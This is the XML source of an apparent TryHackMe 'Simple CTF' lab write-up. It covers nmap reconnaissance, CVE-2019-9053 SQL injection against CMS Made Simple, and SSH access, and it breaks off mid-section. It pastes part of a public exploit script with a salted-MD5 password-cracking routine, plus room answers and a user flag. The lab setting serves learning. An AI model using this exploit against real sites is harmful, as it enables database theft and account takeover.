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1F183">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Simple CTF — TryHackMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6CC2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DCB68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CTF name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Simple CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7279D9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Platform:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TryHackMe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BF393D">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t xml:space="preserve">Author </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: Ishan Chowdhury</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5727EED7">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>07/10/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C9B38E">
      <w:pPr>
        <w:pStyle w:val="12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Style w:val="13"/>
        </w:rPr>
        <w:t>Target VM / Room link:</w:t>
      </w:r>
      <w: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"https://tryhackme.com/room/easyctf" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="11"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>https://tryhackme.com/room/easyctf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7971A644">
      <w:pPr>
        <w:pStyle w:val="12"/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4FA70">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FFEE6D">
      <w:pPr>
        <w:pStyle w:val="12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This report documents my solve of the "Simple CTF" TryHackMe room. I performed reconnaissance, enumeration, exploitation, and privilege escalation. I recovered the user and root flags and documented commands and screenshots for each step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4D965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C42A5">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope, rules &amp; environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48535676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Room/VM name:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Simple CTF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5612DE45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Scope:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Only the TryHackMe VM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3730966D">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>Lab IP :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>10.201.103.197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D0B070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Host OS :</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745B00D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Notes on network setup:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Openvpn configuration file</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A318C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6EC2E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3. Tools and setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B8F97">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">List the tools </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used and versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318D0227">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>Kali Linux 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D039399">
      <w:pPr>
        <w:pStyle w:val="12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t>nmap 7.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478722B2">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Python 3.13.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036B8F0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B4504">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>CTF Questions (please answer each; I'll insert into the report)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686F6B6E">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Below are the exact questions you asked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the TryHackme room</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. For each question, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>I have pasted my</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> answer and the command or script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">used. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46890FC0">
      <w:pPr>
        <w:pStyle w:val="12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rPr>
          <w:rStyle w:val="13"/>
        </w:rPr>
        <w:t>How many services are running under port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618FB8E5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer: 2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081D8AF">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command used: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>nmap -sS -p1-1000 -sV -O --reason -T4 10.201.103.197</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B81F1F8">
      <w:pPr>
        <w:pStyle w:val="12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>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67394B3E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3515" cy="1200150"/>
            <wp:effectExtent l="0" t="0" r="9525" b="3810"/>
            <wp:docPr id="9" name="Picture 9" descr="Screenshot 2025-10-07 12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0-07 1225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7384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8595" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12700"/>
            <wp:docPr id="10" name="Picture 10" descr="Screenshot 2025-10-07 123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0-07 1230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6A81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What is running on the higher port?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372360A2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Answer: SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E78F358">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">used: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -T4 -sC -sV -Pn 10.201.103.197   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7244AF2A">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="1440" w:firstLineChars="600"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BF78AA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2405" cy="3625850"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="11" name="Picture 11" descr="Screenshot 2025-10-07 124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0-07 1248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4080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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="4445" b="12700"/>
            <wp:docPr id="12" name="Picture 12" descr="Screenshot 2025-10-07 123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0-07 1230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47B8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What's the CVE you're using against the application?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A87F5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>CVE-2019-9053</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE82E2D">
      <w:pPr>
        <w:pStyle w:val="12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>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9BE89C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0500" cy="784225"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="16" name="Picture 16" descr="Screenshot 2025-10-07 13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0-07 1317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9FC6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7960" cy="1793875"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="17" name="Picture 17" descr="Screenshot 2025-10-07 13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10-07 1323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8F72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456565"/>
            <wp:effectExtent l="0" t="0" r="6350" b="635"/>
            <wp:docPr id="15" name="Picture 15" descr="Screenshot 2025-10-07 13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0-07 1322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147B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4310" cy="2757805"/>
            <wp:effectExtent l="0" t="0" r="13970" b="635"/>
            <wp:docPr id="13" name="Picture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56339D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To what kind of vulnerability is the application vulnerable?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F61D65D">
      <w:pPr>
        <w:pStyle w:val="12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 xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>sqli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A402299">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468CD76B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0500" cy="492125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10795"/>
            <wp:docPr id="14" name="Picture 14" descr="Screenshot 2025-10-07 13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0-07 1321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28BB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What's the password?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2CEF0">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA3558">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>How found:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4417ED74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#!/usr/bin/env python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703C11FC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</w:p>
    <w:p w14:paraId="7BB6810D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# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple &lt;= 2.2.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CFBEED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# Date: 30-03-2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04707ACA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# Exploit Author: Daniele Scanu @ Certimeter Group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC57609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# Vendor Homepage: https://www.cmsmadesimple.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD55807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# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C26644F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# Version: &lt;= 2.2.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECE8719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# Tested on: Ubuntu 18.04 LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EF4014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# CVE : CVE-2019-9053</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304C946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</w:p>
    <w:p w14:paraId="133B3F55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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D1F79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from termcolor import colored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9E03D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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ABF795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from termcolor import cprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62552ED7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import optparse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3039F1A3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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1FB61C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</w:p>
    <w:p w14:paraId="76B9BF69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parser = optparse.OptionParser()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F15CE56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parser.add_option('-u','--url', action='store', dest='url',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CDFDE2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              help='Base target uri (ex. http://10.10.10.100/cms)')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFECD5E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parser.add_option('-w','--wordlist', action='store', dest='wordlist',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F231F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              help='Wordlist for crack admin password')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C51CBB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parser.add_option('-c','--crack', action='store_true', dest='cracking',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFB4434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              help='Crack password with wordlist', default=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5EC2C6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</w:p>
    <w:p w14:paraId="74B0E300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options, args = parser.parse_args()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8AA5C1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if not options.url:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E50BD2F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print '[+] Specify an url target'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EBC4BD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print '[+] Example usage (no cracking password): exploit.py -u http://target-uri'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766A7649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print '[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137596AE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print '[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583144F3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exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC07EDD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</w:p>
    <w:p w14:paraId="014B1400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url_vuln = options.url + '/moduleinterface.php?mact=News,m1,,default,0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5DB999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session = requests.Session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C2CAC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dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22282D34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flag = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3093FD8F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password = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16AD1F94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temp_password = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05033B90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TIME = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C34B0C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db_name = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC478DE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output = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319693B3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email = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C139EC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</w:p>
    <w:p w14:paraId="7C0E1A9D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salt = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA19969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wordlist = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55747FF4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if options.wordlist:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9B574A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wordlist += options.wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDA9036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</w:p>
    <w:p w14:paraId="1FC15B18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def crack_password():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8AD581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global password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBF6546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global output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BDA380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global wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C1000A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global salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27019DE8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dict = open(wordlist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE210F5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for line in dict.readlines():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14792602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    line = line.replace('\n','')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C79EAF7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    beautify_print_try(line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF84718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    if hashlib.md5(str(salt) + line).hexdigest() == password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2D0028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        output += "\n[+] Password cracked: " + line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF5E612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        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443579AD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dict.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C27CA9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</w:p>
    <w:p w14:paraId="54B55719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def beautify_print_try(value):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2D463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global output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290DACE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print "\033c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D420E7A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cprint(output, 'green', attrs=['bold'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE7D96B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cprint('[*] Try: ' + value, 'red', attrs=['bold'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534BC60A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</w:p>
    <w:p w14:paraId="5707E870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def beautify_print():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CE9ACF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global output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A194BBC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print "\033c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66436DDF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cprint(output, 'green', attrs=['bold'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F12775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</w:p>
    <w:p w14:paraId="0A7493DD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>def dump_salt():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACB0009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global flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC1118E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global salt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E3546">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t xml:space="preserve">    # ... (rest of function not fully visible in screenshot)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00901F77">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rStyle w:val="8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77D72005">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Screenshot: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1015B8BA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0500" cy="359410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="18" name="Picture 18" descr="Screenshot 2025-10-07 130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10-07 1309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7BED">
      <w:pPr>
        <w:pStyle w:val="12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562475" cy="1019175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1905"/>
            <wp:docPr id="19" name="Picture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0BF4BE">
      <w:pPr>
        <w:pStyle w:val="12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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266690" cy="437515"/>
            <wp:effectExtent l="0" t="0" r="6350" b="4445"/>
            <wp:docPr id="1" name="Picture 1" descr="Screenshot 2025-10-07 135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07 1357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8EF9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Where can you login with the details obtained?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE90C3B">
      <w:pPr>
        <w:pStyle w:val="12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>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>swer: ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64075E9E">
      <w:pPr>
        <w:pStyle w:val="12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>Login command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>: ssh mitch@10.201.103.197 -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030F171B">
      <w:pPr>
        <w:pStyle w:val="12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>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F9BE3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1135" cy="2146300"/>
            <wp:effectExtent l="0" t="0" r="1905" b="2540"/>
            <wp:docPr id="20" name="Picture 20" descr="Screenshot 2025-10-07 132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10-07 1328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93A9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2245" cy="518795"/>
            <wp:effectExtent l="0" t="0" r="10795" b="14605"/>
            <wp:docPr id="2" name="Picture 2" descr="Screenshot 2025-10-07 135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07 1358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991539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What's the user flag?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610CB4E2">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Answer: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>G00d j0b, keep up!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377E60F">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command to retrieve it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>cat user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D07971">
      <w:pPr>
        <w:pStyle w:val="12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>Screenshot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E92F8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2867025" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="13335" b="11430"/>
            <wp:docPr id="21" name="Picture 21" descr="Screenshot 2025-10-07 133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10-07 1339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721C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1610" cy="379730"/>
            <wp:effectExtent l="0" t="0" r="11430" b="1270"/>
            <wp:docPr id="22" name="Picture 22" descr="Screenshot 2025-10-07 134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5-10-07 1341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5C6A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Is there any other user in the home directory? What's its name?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE3CD5">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
